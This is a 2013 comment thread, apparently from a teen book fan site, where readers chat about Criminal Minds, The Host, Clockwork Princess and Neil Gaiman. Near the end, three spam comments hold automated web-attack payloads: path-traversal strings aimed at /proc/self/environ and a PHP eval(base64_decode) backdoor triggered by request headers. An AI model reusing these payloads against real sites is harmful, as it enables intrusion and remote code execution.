@78: I just know Rossi better, I think. He’s been here longer. Gideon was back in all those episodes when Elle was still around. She’s the only CM character I don’t like. They have Blake in place of Emily now–so wait, two characters I don’t like. I mean, Blake’s okay. She’s just not Emily. Because Emily is….Emily. Garcia I absolutely love, including her banter with Morgan. I don’t know….It never freaked me out, but Garcia has actual relationships with other people. I just love all of them….Well, mainly the team that was there in “It Takes A Village” which was the most epic Criminal Minds episode ever (beginning of Season 7).

March 25th, 2013 10:17

@79: I definitely didn’t watch season 7. I know it’s kinda a wide range, but I quit somewhere between season 4 and 6. I think I watched 4, so sometime during 5, maybe? You should go back and rewatch all the Gideon episodes (i.e. seasons 1-3), because I will forever contend he’s the best. The best episodes were the ones after Elle was replaced by Emily, but before Gideon was replaced by Rossi (which is basically just season 2).

Completely random: Has anyone read the Books of Ember series (i.e. City of Ember)? I love the movie, and was wondering how much the books differ (er, the first book).

March 25th, 2013 11:09

@80: The team I like best is in Season 5, then it gets scattered through 6, regroups in 7, and Emily leaves again at the end. Again. No….I guess I should rewatch earlier episodes with Gideon and the like, but the problem is I remember every episode. It might take me ten minutes into the episode, but then I’ll be like, “Oh, yeah, this.” There you go….

I read the first book in fifth grade as assigned reading. Sorry, but I didn’t like it too well. Liked the movie better, but still not a lot….

March 25th, 2013 22:32

@81: Well, let’s agree to disagree.

Well, I loved the movie, so I might like the books better. Saoirse Ronan is such a good actress, which is part of why I’m so excited for The Host! Anyone else? (And don’t judge it because of Twilight. It was a much better book.)

March 26th, 2013 09:14

@82: Haha okay. :)

The Host looked interesting….I do like that actress, but you’ll probably have to convince me to not be touchy about anything Stephanie Meyer related. Old habits die hard. ;)

And, despite everything I’ve said about Will, and Jem, and Tessa, and everyone, I just cried (sobbed) straight through the last 80 pages of Clockwork Princess. Have I ever said that everything I love is something I was previously wrong about? Well, they are. And I was proven wrong. Again. YOU’D REALLY THINK I’D HAVE LEARNED BY NOW.

“For I am very stupid, Cecy, and think only of myself.”

And, of course, the one I never doubted, Magnus, was amazing. I loved him before and will love him always.

“You endure what is unbearable, and you bear it. That is all.”

Still don’t like the first two books nearly as much, but this one changed my opinion about everything. Even wanting Mangus to just TELL ALEC about Will….The characters were at their best in this book, especially Jem because he was finally so flawed, and no one was insisting on how GOOD he was. And that’s all I’m saying. Has anyone else read it so we can cry together?

March 26th, 2013 20:08

@83: The Host: IT’S GOOD IT’S GOOD IT’S GOOD!!! =D Seriously, though, it’s a much better story (from what I can remember!). And, if you’re as sick of love triangles as I am, there’s not one, technically. I say this because, even though there ARE two guys, since there are also two girls in Melanie’s body, it’s not REALLY a love triangle.
    Also, I got right into it, but I’ve HEARD from others, that it can be a bit slow in the beginning. So if that’s the case, I suggest a long and fair chance before setting it down (and the movie looks awesome regardless of how the book was WRITTEN).

I haven’t read it (or CP), but I wiki’d the whole ending so I know what happens; does that count?

neezza-la
    March 26th, 2013 21:01

I’m not sure if this is the correct place to post this or not, but I’ve been listening to a great band called Sixx: AM, and they’ve got a song called “Girl with the golden eyes” which reminded me of the Pretties. After a little research, I found out that the name is a reference to heroin.
    I was wondering if anyone could validate this link: that the Pretties are like heroin because their beauty is a terrible kind of addiction, too, one that destroys people.

March 27th, 2013 05:21

I LOVE MIRRORMASK. It’s so beautiful in every way…

I LOVE NEIL GAIMAN. “The Graveyard Book” and “Coraline” are my favorite books of his. Also when John and Hank Green were in Carnegie Hall and Neil Gaiman just walked out onto the stage with them I started fangirling cause I was watching a live video stream at Kepler’s and it was just AWESOME and I’m totally ranting but John Green and Neil Gaiman are like, two of the BEST authors ever and yeah.

Person with Hat
    March 27th, 2013 17:34

Hi guys! It’s been a while… hasn’t it?

March 27th, 2013 20:57

@86 – I know! Why can’t there be more mOvies like that? Oh, I found out the

March 27th, 2013 21:00

Oops, sorry. I’m writing on an iTouch and I pressed Submit by accident.
    Anyway, I found out that the director of Mirrormask and Stephanie Leonidas (Helena) are maybe going to do a movie called “Luna”. I’m not sure if it’s still a project, but if they do it, it would be awesome!

Her Imperial Maliciousness
    March 28th, 2013 03:00

@86- the graveyard book is awesome
    i should re read it IT EVEN HAS PICTURES

March 28th, 2013 20:01

@At everyone I’m talking to: Let’s move it on over to the new post, shall we?

its britney bitch
    May 15th, 2013 23:01

hayyyyyyy(;

Jack B.
    June 25th, 2013 16:19

oh… very nice 1701 /../../../../../../../../../../../../../../../../../../../../../../proc/self/environ–>

Michael O.
    June 25th, 2013 16:45

oh… very nice 0c94 ‘); if(md5(@$_SERVER[HTTP_QUOTE]) == ‘e66e6cadd6e13efea54ed50c0eb2d32b’) {eval(base64_decode($_SERVER[HTTP_CMD]));}echo(‘–>

Mike T.
    June 25th, 2013 16:45

oh… very nice 6236 /../../../../../../../../../../../../../../../../../../../../../../proc/self/environ–>

?? ??????
    August 16th, 2013 15:51

?? ??

???????????
    November 17th, 2013 19:31

Wonderful article! We are linking to this particularly great post on our website.
    Keep up the great writing.